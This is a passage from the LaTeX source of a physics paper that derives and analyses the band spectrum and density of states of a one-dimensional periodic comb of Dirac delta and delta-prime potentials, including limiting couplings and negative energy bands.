\psi^\prime_{k,R}(a/2)-e^{i q a}\psi^\prime_{k,R}(-a/2) & \psi^\prime_{k,L}(a/2)-e^{i q a}\psi^\prime_{k,L}(-a/2)
\end{array}\right)\left(\begin{array}{c} A_n \\[2ex] B_n \end{array}\right)=0\,.
\end{equation} }
{Non trivial solutions in $A_n$ and $B_n$ for \eqref{2.9} only exist if the determinant of the square matrix in \eqref{2.9} vanishes. Using the scattering wave eigenfunctions \eqref{2.2},
we obtain the following secular equation \cite{NIE}:}
\begin{equation}\label{2.11}
\cos(q a)=\frac{e^{i a k} \left(t(k)^2-r_L(k) r_R(k)\right)+e^{-i a k}}{2\,
t(k)}\,\equiv F(\varepsilon=k^2)
\end{equation}
Alternatively, taking into account that from the scattering matrix \eqref{2.3}
\begin{equation}\label{tracedet}
{\rm tr}(S) = 2 t(k)\qquad \text{and}\qquad \det (S)= t^2(k)-r_R(k)r_L(k),
\end{equation}
we can write the secular equation \eqref{2.11} as
{\begin{equation}\label{2.12}
{\rm tr}(S)\cos(q a)=e^{-i a k}+\det (S)e^{i a k}\,.
\end{equation}
This equation enables to obtain the band energy spectrum as the different branches $\varepsilon= \varepsilon_n(q)$ of the function $F(\varepsilon)$ for $q\in[-\pi/a,\pi/a]$, that obviously, from \eqref{2.11}, are a symmetric function of $q$: $\varepsilon_n(-q)=\varepsilon_n(q)$. } Notice that for any branch $\varepsilon_n(q)$ taking the derivative of \eqref{2.11} with respect to $q$ we have
\begin{equation}\label{2.16a}
-a \sin (q a)= \left. \frac{d F(\varepsilon)}{d\varepsilon}\right\vert_{\varepsilon_n} \frac {d\varepsilon_n}{dq }\,,
\end{equation}
and therefore, as the left hand side of \eqref{2.16a} only vanishes at $q=0,\pm\pi/a$ in the first Brillouin zone, we get the following important consequences:
\begin{itemize}
\item
The function $\varepsilon_n(q)$ is monotone on the intervals $(-\pi/a,0)$ and $(0,\pi/a)$. Otherwise it would have a critical point inside any of the intervals which would make $\frac {d\varepsilon_n}{dq }=0$, making the r.h.s of \eqref{2.16a} equal to zero. The function $\varepsilon_n(q)$ has either a maximum or a minimum at $q=0,\pm \pi/a$.
\item
As a consequence of the above, the function $F(\varepsilon)$ is monotone for all $\varepsilon$ in every branch $\varepsilon_n(q)$.
\end{itemize}
{Since the scattering amplitudes $\{t(k),r_R(k),r_L(k)\}$ have better analytical properties in the complex plane we can use equation \eqref{2.11} to write down the inequality that characterises the whole band spectrum} of the system in terms of either $k$ or the energy $\varepsilon=k^2$:
{\begin{equation}\label{2.17}
\left\vert \frac{e^{i a k} \left(t(k)^2-r_L(k) r_R(k)\right)+e^{-i a k}}{2
t(k)}\right\vert
= \left\vert F(\varepsilon=k^2)\right\vert \leq 1\,.
\end{equation}
As shown in \cite{KURASOVLARSON}, the eigenfunctions at the band edges are of particular importance, i.e., those Bloch waves characterised by the values of the momenta $k_i$ such that
\begin{equation}\label{2.18}
\left\vert F(\varepsilon=k_i^2)\right\vert= 1, \qquad i=0,1,2, \dots
\end{equation}}
The discrete set of momenta satisfying \eqref{2.18} show the lower and higher value of $k$ for each allowed band. If for some of these points, say $k_i$, we have $k_i=k_{i+1}$ there is no gap between two consecutive bands. Furthermore, this is more probable to happen for high values of $k$ and then $|t(k)|$ is close to one (see Ref. \cite{KURASOVLARSON}).
There are two extreme situations. When the compact potential $V_C(x)$ is opaque, the transmission coefficient vanishes: $t(k)=0$. Under this conditions, equation \eqref{2.12} takes the form
\begin{equation}\label{2.19}
e^{-2 i k a}-r_R(k) r_L(k)=0\,.
\end{equation}
In this case the band equation becomes the secular equation of a square well with opaque edges, giving rise to a discrete energy spectrum. The other extreme situation is when the potential $V_C(x)$ is transparent: $ |t(k)|=1$. In this case, we do not have a band structure as from { \eqref{2.11}} the spectrum coincides with the free particle spectrum.
There is another possibility, which is the existence of negative energy bands (arising from localised states bound states of the potential with compact support from which the lattice is built, in case they exist). These are solutions of \eqref{2.11} for imaginary momenta, i.e., $k=i\kappa$, with $\kappa>0$, so that the energy is negative: $\varepsilon=-\kappa^2<0$. The allowed energies for {these bands} satisfy the following inequality:
\begin{equation}\label{2.21}
\left\vert \frac{e^{- a \kappa} \left(t(i\kappa)^2-r_L(i\kappa) r_R(i\kappa)\right)+e^{ a \kappa}}{2
t(i\kappa)}\right\vert\leq 1\,.
\end{equation}
Thus far, we have discussed the general form of the inequalities providing energy and momentum allowed bands for the periodic potentials under our consideration. Let us see now some properties of a crucial magnitude: the density of states.
\subsection{The density of states}\label{dos21}
The density of states $g(\varepsilon)$ in Solid State Physics contains the information about the distribution of energy levels. It plays a central role in the calculation of thermodynamic quantities from the physical properties defined by the quantum mechanical problem of one particle moving in the periodic potential that defines the crystal system, specially those magnitudes involving averages over {occupied levels} such as the internal energy, thermal and electric conductivity, etc.
This function $g(\varepsilon)$ is defined {as the} number of energy eigenvalues between $\varepsilon$ and $\varepsilon+d\varepsilon$ divided by the length of the first Brillouin zone $2\pi/a$. {We may write the general expression for the density of states for a given band produced by a one-dimensional periodic potential as
\begin{equation}\label{2.22}
g_n(\varepsilon)= \frac{a}{2\pi} \int_{-\pi/a}^{\pi/a} \delta(\varepsilon-\varepsilon_n(q))\, d q =
\frac{a}{\pi} \int_{0}^{\pi/a} \delta(\varepsilon-\varepsilon_n(q))\, d q,
\end{equation}
because $\varepsilon(q)=\varepsilon(-q)$. It is noteworthy that
$\varepsilon(q)$ is multivalued and its $n$-th branch $\varepsilon_n(q)$ is the $n$-th energy band.
Equation \eqref{2.11} gives the energy as a function of the quasi-momentum $q$ for the $n$-th energy band, in terms of a function $\varepsilon_n=\varepsilon_n(q)$ for $q\in [-\pi/a,\pi/a]$.}
As already proven, the functions $\varepsilon_n(q)$ are monotone, and therefore if we make a change the variable $y_n=\varepsilon_n(q)$ we get
\begin{equation}\label{2.22b}
g_n(\varepsilon) = \frac{a}{\pi} \int_{\varepsilon_n(0)}^{\varepsilon_n(\pi/a)} \frac{dq}{d y_n}\ \delta(\varepsilon-y_n)\, d y_n=
\frac{a}{\pi} \left\vert \frac{dq}{d \varepsilon} \right\vert \int_{m_n}^{M_n} \delta(\varepsilon-y_n)\, d y_n,
\end{equation}
where $m_n= \min\{\varepsilon_n(0), \varepsilon_n(\pi/a)\}$ and $M_n= \max\{\varepsilon_n(0), \varepsilon_n(\pi/a)\}$. Then, the whole density of states will be
\begin{equation}\label{2.22c}
g(\varepsilon)=\sum_{n} g_n(\varepsilon) = \frac{a}{\pi} \left\vert \frac{dq}{d \varepsilon} \right\vert \left(\sum_{n} \int_{m_n}^{M_n} \delta(\varepsilon-y_n)\, d y_n \right).
\end{equation}
Observe that the term in parentheses in \eqref{2.22c} is one if $\varepsilon$ belongs to any allowed band and is zero otherwise. From {\eqref{2.11}}, the explicit form of the function $q(\varepsilon)$ is
\begin{equation}\label{2.26}
q(\varepsilon)=\frac{1}{a} \arccos F(\varepsilon)\,.
\end{equation}
For the values of $\varepsilon$ outside any allowed band, the absolute value of the $F(\varepsilon)$ is bigger than one, and therefore $\arccos F(\varepsilon)$ becomes purely imaginary. This fact allows us to give a general expression for the density of states if we take into account that
\begin{equation}\label{2.28}
\left\vert \frac{dq}{d \varepsilon} \right\vert \left(\sum_{n} \int_{m_n}^{M_n} \delta(\varepsilon-y_n)\, d y_n \right)
=
\left\vert {\rm Re}\left(\frac{dq(\varepsilon)}{d\varepsilon}\right)\right\vert\,.
\end{equation}
Hence,
\begin{equation}\label{2.29}
g(\varepsilon)=\frac{1}{\pi} \left\vert {\rm Re} \left[\frac{d}{d\varepsilon}\arccos F(\varepsilon) \right]\right\vert,
\end{equation}
a very important result that will be used in the sequel.
{If the charge carriers are fermionic particles, the probability of occupying a state of energy $\varepsilon$ is given by the Fermi-Dirac distribution. Hence, in order to obtain the average number of fermions per unit energy and unit volume, the density of states must be multiplied by the Fermi-Dirac distribution as follows:
\begin{equation}
N(\varepsilon)= g(\varepsilon) \frac{1}{e^{(\varepsilon-\mu)/T}+1}
\end{equation}
where $\mu$ is the chemical potential. $\mu(T)$ is also called the Fermi level and its value at $T=0$ is the Fermi energy. Zones with positive energy can turn out to be valence bands, and zones with negative energies, including the lowest one, can be conduction bands depending on the position of the Fermi energy. In addition, all the energies from the allowed zones belong to the absolutely continuous spectrum of the energy operator and the corresponding states are delocalized.}
On the other hand, if the charge carriers are bosonic particles the average number of particles per unit volume and energy follows the Bose-Einstein statistic:
\begin{equation}
N(\varepsilon)= g(\varepsilon) \frac{1}{e^{(\varepsilon-\mu)/T}-1}.
\end{equation}
It is noteworthy that at zero temperature, all bosons are localised in the minimum energy state giving rise under special circumstances to the Bose-Einstein condensation. Recently the system we are studying in this paper has been the focus of attention concerning the possibility of having Bose-Einstein condensation in one-dimensional periodic systems \cite{bordagJPA2019}.
\section{The one-species hybrid Dirac comb}\label{sec_1species}
In the present section, we discuss the periodic one-dimensional system with Hamiltonian given by $H_P$ as defined {in} \eqref{2.4}. We use the terminology of {\it one-species hybrid Dirac comb} for this model. Hybrid because it combines the Dirac delta and its first derivative. The use of one-species will be clarified later when we introduce a two-species hybrid Dirac comb. Our objective is the determination and analysis of the band spectrum of $H_P$. In the previous section, we have seen that permitted and prohibited energy bands can be determined after inequalities like \eqref{2.17}, \eqref{2.18} and \eqref{2.21} that involve the modulus of the secular equation. As previously shown, this secular equation depends on the transmission and reflection coefficients for the scattering produced by a potential of the form $V_C(x)= w_0\,\delta(x)+2w_1\,\delta'(x)$, where $w_0$ and $w_1$ were given in Section 1.2. The explicit form of these coefficients were given in \cite{GNN} and are
\begin{eqnarray}\label{3.1}
&\hspace{-0.8cm} \displaystyle t(k)=\frac{(1-w_1^2)k}{(1+w_1^2)k+i w_0/2} , \quad & r_R(k)=-\frac{2 k w_1+i w_0/2}{(1+w_1^2)k+i w_0/2}, \quad
\displaystyle r_L(k)=\frac{2 k w_1-i w_0/2}{(1+w_1^2)k+i w_0/2},
\label{3.1.5}
\end{eqnarray}
Then, replacement of \eqref{3.1} on \eqref{2.11} gives
\begin{equation}\label{3.2}
{\cos( q a)= f(w_1) \left[ \cos (k a)+\frac{a}{2}w_0\ h(w_1)\,
\frac{\sin (k a)}{k a} \right]\equiv F(k;w_0,w_1)\,,}
\end{equation}
where the functions $f(w_1)$ and $h(w_1)$ are, respectively,
\begin{equation}\label{3.3}
f(w_1)=\frac{1+w_1^2}{1-w_1^2} \,,\qquad
h(w_1)= \frac{1}{1+w_1^2}\,.
\end{equation}
This result enables us to perform a detailed quantitative and qualitative study of the band spectrum and the density of states of the $\delta$-$\delta^\prime$ comb in the forthcoming subsections.
\paragraph{A brief remark on the generalised Dirac comb and the $\delta'$-potential} The one-species Dirac comb in Eq. \eqref{1.8} has been previously studied in Ref. \cite{refe1}. Nevertheless the definition used by the authors of the mentioned paper is not equivalent to the one used in this paper. Let us go into more detail to make clear the difference, and therefore clarify why different band spectra are to be expected in our case. To start with, the definition of $$\widehat K^{(1)}_{
0,w_1}=-\frac{d^2}{dx^2}+w_1\delta'(x)$$ shown in Ref. \cite{refe1} is given by a certain selfadjoint extension of the operator
\begin{equation}\label{h0}
\widehat K=-\frac{d^2}{dx^2}
\end{equation}
acting on class-$(2,2)$ Sobolev functions over the space
$$\mathbb{R}^*\equiv\mathbb{R}/\{0\}.$$ Specifically, the selfadjoint extension used to define the $\delta^\prime$ potential in Ref. \cite{refe1} is characterised by a domain of functions satisfying the matching conditions
\begin{equation}
\psi'(0^+)-\psi'(0^{-})=0, \,\,\psi(0^+)-\psi(0^-)=w_1\psi'(0),
\end{equation}
or equivalently,
\begin{equation}\label{dpr}
\left(
\begin{array}{c}
\psi (0^+) \\
\psi' (0^+) \\
\end{array}
\right)=\left(
\begin{array}{cc}
1 & w_1 \\
0 & 1 \\
\end{array}
\right)\cdot\left(
\begin{array}{c}
\psi (0^-) \\
\psi' (0^-) \\
\end{array}
\right).
\end{equation}
In contrast to Ref. \cite{refe1}, the Hamiltonian with a point interaction used in our manuscript
\begin{equation}
\widehat K^{(2)}=-\frac{d^2}{dx^2}+w_0\delta(x)+w_1\delta'(x)
\end{equation}
acting as well on the class-$(2,2)$ Sobolev space follows from \cite{GNN}, and is the selfadjoint extension of the operator \eqref{h0} characterised by the matching conditions
\begin{equation}
\left(
\begin{array}{c}
\psi (0^+) \\
\psi' (0^+) \\
\end{array}
\right)=\left(
\begin{array}{cc}
\alpha & 0 \\
\beta & \alpha^{-1} \\
\end{array}
\right)\cdot\left(
\begin{array}{c}
\psi (0^-) \\
\psi' (0^-) \\
\end{array}
\right),
\end{equation}
where
\begin{equation}
\alpha\equiv\frac{1+w_1}{1-w_1},\quad\beta\equiv\frac{w_0}{1-w_1^2}.
\end{equation}
It is straightforward to obtain the matching condition that characterises our definition of
\begin{equation}
\widehat K^{(2)}_{0,w_1}=-\frac{d^2}{dx^2}+w_1\delta'(x)
\end{equation}
by just making $\beta=0$:
\begin{equation}\label{dpus}
\left(
\begin{array}{c}
\psi (0^+) \\
\psi' (0^+) \\
\end{array}
\right)=\left(
\begin{array}{cc}
\alpha & 0 \\
0 & \alpha^{-1} \\
\end{array}
\right)\cdot\left(
\begin{array}{c}
\psi (0^-) \\
\psi' (0^-) \\
\end{array}
\right).
\end{equation}
Clearly, comparing Eqs. \eqref{dpr} and \eqref{dpus} one can easily conclude that definition of the $\delta'$ is the different the as the one shown in Ref. \cite{refe1}. Furthermore, the definition of the $\delta'$ used in Ref. \cite{refe1} turns out to be {\it{\bf non local}}, meanwhile the one we used in our paper is {\it{\bf local}}. The comparison between both possible definitions has been discussed in Refs. \cite{ALB1,SE,FAS,m2,rpmF,fronphysG}.
\subsection{Analysis of the secular equation}
{From the general analysis carried out in the previous section the allowed energy gaps in this particular case are characterised by the condition $|F(k,w_0,w_1)|\leq 1$ where $F(k,w_0,w_1)$ is defined in \eqref{3.2}}. The solutions $\{k_i\}$, $i=0,1,2,3...$ of \eqref{2.18} can also be characterised by the critical points of \eqref{3.2} in the sense that they are solutions of the equation
\begin{equation}\label{3.8}
\frac{d}{dk}\; \left[ \cos( k a)+\frac{a}{2}w_0\ h(w_1)\,
\frac{\sin (k a)}{k a} \right]=0\,.
\end{equation}
From \eqref{3.8}, we conclude that the limits between allowed and forbidden bands depend on the values of the parameters $w_0$ and $w_1$.
Next, we proceed to the analysis of the band distribution in terms of the pair $(w_0,w_1)$. Here, we shall focus our attention on those values of $(w_0,w_1)$ that give rise to a limiting or critical behaviour.
It is convenient to introduce a notation showing the dependence of the scattering coefficients with $w_0$, $w_1$ as well as with $k$. In the sequel, we shall write $t(k,w_0,w_1)$, $r_R(k,w_0,w_1)$, $r_L(k,w_0,w_1)$ and $\delta(k,w_0,w_1)$, so that the dependence on the coefficients is manifested. In this context, we have singled out six cases:
\begin{enumerate}
\item
{For $w_0=w_1=0$, we must have the free particle over the real line. This is indeed the case, since $|t(k,0,0)|=1$ for any value of $k$ and, consequently, there is no band spectrum, but a complete continuum spectrum $\varepsilon\in(0,\infty)$. }
\item
{The case in which no $\delta'$ interaction is present ($w_1=0$, $|w_0|<\infty$), gives rise the standard Dirac delta one-dimensional comb \cite{kronig-prsa31}. }This implies that $f(0)=h(0)=1$, where $f(w_1)$ and $h(w_1)$ have been defined in \eqref{3.3} and that the secular equation \eqref{3.2} takes the well known expression
\begin{equation}\label{3.14}
\cos( q a)= \cos (k a)+ \frac{a}{2}\,w_0\, \frac{\sin (k a)}{ k a}\,.
\end{equation}
The band edge points are given by the discrete solutions, on $k_j$, of the following transcendental equations:
\begin{equation}\label{3.15}
\sqrt{\frac{4 k_j^2+w_0^2}{4 k_j^2}}\;\cos\left[k_ja+\arctan\left(\frac{2 k_j}{w_0}\right)-{\rm sg}(w_0)\frac{\pi}{2}\right]=\pm 1\,.
\end{equation}
Thus, we recover in this limiting case all the well known expressions for the Dirac comb.
\item
If $w_0=0$ with $w_1$ arbitrary but finite, there are no $\delta$-potentials, and there is only $\delta'$ potentials in the comb. For a pure $\delta^\prime$-potential all scattering amplitudes are independent of the energy. In fact,
\begin{equation}\label{3.11}
t(k,0,w_1)=\frac{1-w_1^2}{1+w_1^2}\,, \quad r_R(k,0,w_1)=-\frac{2 w_1}{1+w_1^2} \,,\quad r_L(k,0,w_1)=\frac{2 w_1.}{1+w_1^2}\,.
\end{equation}
Moreover, the total phase shift vanishes: $\delta(k,0,w_1)=0$. Hence the secular equation \eqref{3.2} simplifies to
\begin{equation}\label{3.13}
\cos( q a)=\frac{1+w_1^2}{ 1-w_1^2}\, \cos (k a)\,.
\end{equation}
\item
When $w_0$ is arbitrary, although finite, and $w_1=\pm 1$, the transmission coefficient vanishes, $t(k,w_0,\pm 1)=0$ and\footnote{It is of note that the critical values $w_1=\pm1$ occur when the parameter $\lambda$ in \eqref{1.7} satisfies $|\lambda|= \hbar^2/m=7.62\, {\rm eV}\si{\angstrom}^2$ for the electron. }
\begin{equation}\label{3.10}
r_R(k,\omega_0,-1)=r_L(k,w_0,1)=\frac{4 k-i w_0}{4 k + i\omega_0}\,, \qquad r_R(k,w_0,1)=r_L(k,w_0,-1)=-1\,,
\end{equation}
therefore the potential is opaque at each node. Consequently, as was shown in Ref. \cite{JMG}, when $w_1=+1$ the left edge ($x\to n a^-$) behaves {as a boundary with Dirichlet condition and the right edge ($x\to n a^+$) behaves as a boundary with Robin conditions}, and the opposite for $w_1=-1$. Hence, in the limit $w_1\to\pm 1$ the comb becomes an infinite collection {of boxes with length $a$ and} opaque walls where Dirichlet/Robin boundary conditions are satisfied in each side of the box. In this situation solutions to \eqref{3.2} are given by the discrete set $\{k_n\}$ satisfying the following transcendental equation
\begin{equation}\label{3.9}
\frac{\tan(k_n a)}{k_n a}=-\frac{4}{w_0 a}
\end{equation}
\item
Let us consider the limiting cases where $w_0=\pm\infty$ and $w_1$ is finite. In these cases, the transmission amplitude vanishes for all $k$, i.e., $|t(k,\pm\infty,w_1)|=0 $. There are solutions to the secular equation \eqref{3.2} only if $k_n=\frac{\pi}{a}n$, where $n$ is a positive integer. Hence the spectrum is purely discrete because all the allowed bands collapse to a point {($\varepsilon_n(q)$ becomes a flat line)}. The reflection amplitudes are constant, $r_R(k,\pm\infty,\omega_1)= r_L(k,\pm\infty,\omega_1)=-1$. Note that for a given integer $n$, there is an infinite number of eigenfunctions with energy $\varepsilon_n=k_n^2$ since the system becomes an infinite array of identical boxes with opaque Dirichlet walls.
\item
When $w_1=\pm\infty$ the scattering data \eqref{3.1}-\eqref{3.1.5} gives $t(k)=-1$ and $r_R(k)=r_L(k)=\delta(k)=0$. Therefore in this situation we recover the free particle continuum spectrum.
\end{enumerate}
We finish the description of some relevant limiting cases at this point and we pass to study the band spectrum structure of the one-species hybrid Dirac comb.
\subsection{Structure of the band spectrum}
{So far, we have focused our attention on the positive band energy spectrum. As it is well known, the spectrum of positive energy bands contains an infinite number of allowed bands\footnote{This statement excludes the extreme situations in which one recovers the continuum spectrum of the free particle ($w_1=\pm\infty$ or $w_1=w_0=0$).}, since we are dealing with an infinite linear chain. Furthermore, when the coupling $w_0<0$, the $\delta\text{-}\delta'$ potential admits at most one bound state. This means that there might be situations in which the hybrid Dirac comb has one negative energy band (giving rise to non-propagating states) which can be characterised by pure imaginary momenta $k=i\kappa$ with $\kappa>0$.} In the present subsection we study the conditions for the existence of a negative energy band and the conditions for the existence of a gap between the negative energy band (localised states) and the first positive energy band (propagating states).
\subsubsection{Negative energy bands in the pure $\delta$-comb}
To start with, we study these questions for the pure Dirac delta comb with attractive deltas. From \eqref{3.2}, it is easy to obtain the secular equation for the Dirac comb with attractive delta potentials by choosing $w_1=0$ and $w_0<0$, and purely imaginary momenta:
\begin{equation}\label{3.16}
\cos( qa) = F(i\kappa;w_0,0) \,, \qquad F(i\kappa;w_0,0) =\cosh (\kappa a) - \frac a2\,|w_0|\,\frac{\sinh (\kappa a)}{\kappa a}\,.
\end{equation}
From Eq. \eqref{3.16}, we obtain the following relations:
\begin{equation}\label{3.17}
F(0;w_0,0) =1-\frac a2\,|w_0| \qquad {\rm and} \qquad \left. \frac{\partial F}{\partial\,\kappa}(i\kappa; w_0,0) \right|_{\kappa=0} =0\,.
\end{equation}
After \eqref{3.17}, we observe that $\kappa=0$ is a critical point of the even function of $\kappa$ given by $F(i\kappa;w_0,0)$. In addition:
\begin{itemize}
\item
For the second derivative with respect to the variable $\kappa$, we have that
\begin{equation}\label{3.18}
\left. \frac{\partial^2 F}{\partial\,\kappa^2}(i\kappa; w_0,0) \right|_{\kappa=0} = a^2\left( 1- \frac{a}{6}\,|w_0|\right).
\end{equation}
\item
We have the following limit:
\begin{equation}\label{3.18p}
\lim_{\kappa \to \pm\infty} F(i\kappa;w_0,0)= +\infty\,.
\end{equation}
\item
Within the interval $0<|w_0|a<6$ and for $\kappa>0$, the first derivative of $F(i\kappa;w_0,0)$ is positive. This means that {$F(i\kappa;w_0,0)$} is also strictly monotonic. Thus for $0<|w_0|a<6$, no relative extrema (maxima or minima) may exist, except for the minimum at the origin.
\end{itemize}
All these facts have important consequences that we list in the sequel:
\begin{itemize}
\item[$*$]
Values of $a$ and $w_0$ for which $0<|w_0|a<4$. There is a minimum of $F(i\kappa;w_0,0)$ at the origin with absolute value smaller than one. In consequence, the function $F(i\kappa;w_0,0)$ does not intersect the line $F=-1$ and intersects the line $F=1$ at some point $\kappa_1$. Then, in principle, the valence band should be in the energy interval $[-\kappa^2_1,0] $, as these are the energy values for which the modulus of $F(i\kappa;w_0,0)$ is smaller than one. In additon, we must take into account the existence of the conduction band, which is characterised by the values of $k^2$ for which $|F(k;w_0,0)|\le 1$. This gives an interval of energies $[0,k^2_2]$ for the conducting band. Therefore, we have a valence-conducting band in the energy interval $[-\kappa_1^2,k^2_2]$.
\item[$*$]
Values for which $4<|w_0|a<6$. From \eqref{3.18}, we see that $\kappa=0$ is still a minimum, although in this case, this minimum, $F(i0;w_0,0)$, is smaller than $-1$. In consequence, $\kappa^2=0$ is not an allowed value for the energy. The straight lines $F=\pm 1$ cut $F(i\kappa;w_0,0)$ at the points $\kappa_1$ ( $F=1$) and $\kappa_2$ ($F=-1$). Since $F(i\kappa;w_0,0)$ is strictly growing on the semi-axis $\kappa\in(0,\infty)$, it comes out that $\kappa_2<\kappa_1$. Here, we have a valence band in the interval
$[-\kappa_1^2,-\kappa_2^2]$.
\item[$*$]
Finally, we may have that $6<|w_0|a$. Now, $F(i\kappa;w_0,0)$ shows a {\it maximum} at $\kappa=0$ and a minimum at some point $\kappa_0$. The maximum, $F(i0;w_0,0)$ is smaller than $-1$ and so is the value of $F(i\kappa;w_0,0)$ at the minimum. The situation is exactly as is in the previous case.
\end{itemize}
\subsubsection{The band spectrum for the hybrid $\delta$-$\delta'$ comb}
We want to underline that the main objective of the present work is the analysis of the band structure differences between the usual Dirac comb and the hybrid Dirac comb we have introduced in here. The strategy to accomplish this goal goes as follows: first, we fix a value for $w_0$ and then study how the solutions of the secular equation (\ref{3.2}) vary with $w_1$. We do not expect to obtain an analytic closed form for this dependence. Instead, we rely on numerical and graphic methods with the aid of the package Mathematica.
Let us go back to \eqref{3.2} and take $k=\sqrt\varepsilon$. We already know that the energy for the allowed bands satisfy the inequality
\begin{equation}\label{3.19}
\left\vert F(\sqrt{\varepsilon}; w_0,w_1)\right\vert=\left\vert f(w_1) \left[ \cos(a\sqrt{\varepsilon})+\frac{a}{2}w_0\ h(w_1)\,
\frac{\sin(a\sqrt{\varepsilon})}{a\sqrt{\varepsilon}} \right] \right\vert\leq 1\,.
\end{equation}
The choice of $\varepsilon$ as variable in \eqref{3.19} instead of $k$ has the purpose that just one single expression as \eqref{3.19} be valid for both {positive and negative energy bands}, depending on the sign of the energy $\varepsilon$.
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{1sp-weak_att1.jpg}\qquad \qquad \includegraphics[height=0.22\textheight]{1sp-weak_att2.jpg}
\caption{(color online) On the left, allowed (yellow) and forbidden (blue) energy bands from \eqref{3.19} for $w_0=-0.5$ and $a=1$. On the right a zoom of the lowest energy band. The horizontal red line represents level $\varepsilon=0$.}
\label{Figure1}
\end{center}
\end{figure}
In Figures~\ref{Figure1}-\ref{Figure2}, we represent allowed ($\left\vert F(\sqrt{\varepsilon}; w_0,w_1)\right\vert\leq1$) and forbidden ($\left\vert F(\sqrt{\varepsilon}; w_0,w_1)\right\vert>1$) bands in terms of $w_1$ for given fixed values of $w_0$. The conclusions that we have reached after our results are the following:
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{1sp-strong_att1.jpg}\qquad \qquad\includegraphics[height=0.22\textheight]{1sp-weak_rep1.jpg}
\caption{(color online) On the left, allowed (yellow) and forbidden (blue) energy bands from \eqref{3.19} with $a=1$.Left: $w_0=-12$. Rihgt: $w_0=0.5$. The horizontal red line represents level $\varepsilon=0$.}
\label{Figure2}
\end{center}
\end{figure}
\begin{enumerate}
\item
The opaque couplings $w_1=\pm1$ make the allowed energy bands collapse to isolated points, {so that we have a discrete energy spectrum coming from the well known secular equation \eqref{3.9}. This is in agreement with the numerical results shown in Figures~\ref{Figure1}-\ref{Figure2}: when $w_1=1$ the width of each allowed energy band becomes zero}.
\item
For any given real value of $w_0$, the forbidden energy bands disappear in the asymptotic limit $|w_1|\to \infty$, so that this limit gives the free particle. The explanation of this apparently surprising outcome is the following: from \eqref{3.1} $t(k,w_0,\pm \infty)=-1$, thus the scattering due to the {$\delta-\delta'$ interaction} is almost transparent with just a difference of a phase shift $\pi$ after trespassing the $\delta'$ potential. Hence, when $|w_1|$ becomes large, the ``crystal'' effect disappears and the system behaves as the free particle on the real line. We reach the conclusion that the $\delta'$ coupling at $w_1=\pm\infty$ is not strong but on the contrary quite weak!
\end{enumerate}
From the analysis of these plots we observe that there are regions in the $(w_0,w_1)$-plane where there exists a negative energy band (the yellow regions below the horizontal red line in Figures \ref{Figure1} and \ref{Figure2}), and regions where there is no negative energy band, such as in the right plot of Figure \ref{Figure2} where the red line never intersects a yellow area. The situations in which the lowest energy band is positive correspond to a system where the charge carriers in the crystal move freely along it {as a plane wave}. Concerning the situation in which there is a negative energy band we can distinguish two very different behaviours\footnote{{The behavior of this system as a conductor or insulator, depends on the number of charge carriers in the crystal, that together with the band spectrum fixes the position of the Fermi level.}}:
\begin{itemize}
\item
{When there is no gap between the negative energy band and the first positive energy band (regions where the red horizontal line is contained in the yellow area in Figures \ref{Figure1} and \ref{Figure2}) the carriers in the crystal can go from localised quantum states ($\varepsilon <0$) to propagating states ($\varepsilon>0$). This is a typical conductor behaviour when the charge carriers are fermions and the lowest energy band is not completely filled.
\item
On the other hand when there is a gap between the negative energy band and the first positive energy band (regions where the red horizontal line is contained in the blue area in Figure \ref{Figure2}) all the carriers in the crystal are occupying localised quantum states ($\varepsilon<0$). The existence of such a gap demands an external energy input to promote carriers from the negative energy band to the positive one. Hence whenever the negative energy band is completely filled by carriers of spin $1/2$ this is a typical semiconductor or insulator behaviour depending on the size of the gap. }
\end{itemize}
\subsection{Dispersion relation and density of states in allowed bands}
In our treatment of a particle moving through a periodic potential, it is noteworthy the emergence of some interesting features.
\subsubsection{Effect of the $\delta'$ on the energy bands}
Let us first consider the dispersion relation for each band $\varepsilon_n(q)$, given in \eqref{3.2} {making $k=\sqrt{\varepsilon}$. In Figures} \ref{Figure44}-\ref{Figure66} it is shown the behaviour of the energy band
$\varepsilon_n(q;w_0,w_1)$ given by the solutions of the
transcendental equation \eqref{3.2}. In each plot, the band $\varepsilon_n(q;w_0,w_1)$ is compared with the corresponding energy band of the $\delta$ comb, which is $\varepsilon_n(q;w_0,0)$.
From Figures \ref{Figure44}-\ref{Figure66} we can infer the following general properties:
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{energy_m2.jpeg}
\quad \quad
\includegraphics[height=0.22\textheight]{energy_m5.jpeg}
\caption{(color online) First two allowed energy bands for the Dirac comb (solid green curve) and the one-species hybrid comb (dashed lines), given by \eqref{3.2}.
On the left $w_0=-2$ for all the cases and on the right $w_0=-5$. In both cases the black line represents the zero energy level.}
\label{Figure44}
\end{center}
\end{figure}
\begin{enumerate}
\item
When the Dirac-$\delta$ comb has a completely negative energy band ($w_0<<0$), i.e. there is forbidden energy gap between localised states and lowest energy propagating states (see Figure \ref{Figure44} right and \ref{Figure2} right), the appearance of a $\delta'$ term dramatically shifts the negative energy band towards higher energies.
Moreover, when the $\delta'$ coupling $w_1$ becomes large enough, {the negative energy band disappears to become a positive energy band. In addition, when the Dirac-$\delta$ comb is such that there is no gap between the highest negative energy state and the lowest positive one (see Figure \ref{Figure44} left) the appearance of a $\delta'$ term does not shift the energy band towards higher energies.}
\item
When the Dirac deltas are repulsive (that is, $w_0>0$, see Figure \ref{Figure66}), the appearance of a
$\delta'$ term shifts the maximum and minimum energy of each band. In any case $\varepsilon_n(qa=\pm\pi)$ decreases and $\varepsilon_n(0)$ {increases as $w_1$ does} for those energy bands $\varepsilon_n(q)$ such that $n=0,2,4...$. The effect is exactly the opposite for $n=1,3,5...$.
Nevertheless, in this case the lowest energy band remains in any case within the positive energy region.
\item
In all cases, as can be seen on Figures \ref{Figure44} and \ref{Figure66}, the introduction of the $\delta'$ term changes the curvature module of the allowed energy bands. On the one hand, whenever $|w_1|<1$ (subcritical values) the sign of the curvature of the allowed energy bands is the same as in the Dirac $\delta$ comb case. On the other hand, when $|w_1|>1$ (supercritical values) the sign of the curvature of the allowed energy bands changes with respect to the Dirac $\delta$ comb case.
\begin{figure}[htbp]
\begin{center}
\includegraphics[height=0.22\textheight]{energy_5.jpg}
\caption{(color online) First two allowed energy bands for the Dirac comb (solid green curve) and the one-species hybrid comb (dashed lines), given by \eqref{3.2}, with $w_0=5$ in all the cases.
All the band have positive energy $\varepsilon$ because $w_0>0$.}
\label{Figure66}
